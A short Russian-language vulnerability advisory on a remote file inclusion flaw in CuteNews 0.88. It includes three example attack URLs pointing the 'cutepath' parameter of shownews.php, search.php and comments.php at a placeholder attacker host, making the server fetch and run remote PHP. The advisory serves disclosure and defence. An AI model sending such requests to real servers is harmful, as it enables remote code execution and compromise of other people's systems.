Выполнение произвольных команд в CuteNews
- Дата публикации:
- 03.03.2003
- Дата изменения:
- 17.10.2006
- Всего просмотров:
- 3911
- Опасность:
- Высокая
- Наличие исправления:
- Да
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Компрометация системы
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- CuteNews 0.x
Описание: Уязвимость включения файла обнаружена в CuteNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системе на целевом сервере.
Сообщается, что несколько сценариев включают файлы, не подтверждая правильность местоположения включенного файла. Удаленный пользователь может создать URL, который определяет удаленное местоположение для 'config.php' и 'news.txt' файлов, чтобы заставить сервер выполнить дистанционно расположенный PHP файл. Уязвимы сценарии 'shownews.php', 'search.php', и 'comments.php':
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTAC KER]/ http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/ где http://[ATTACKER]/config.php или http://[ATTACKER]/news.txtЛюбые команды будут выполнены с привилегиями Web сервера.
Уязвимость обнаружена в CuteNews 0.88
Ссылки:
PHP code injection in CuteNews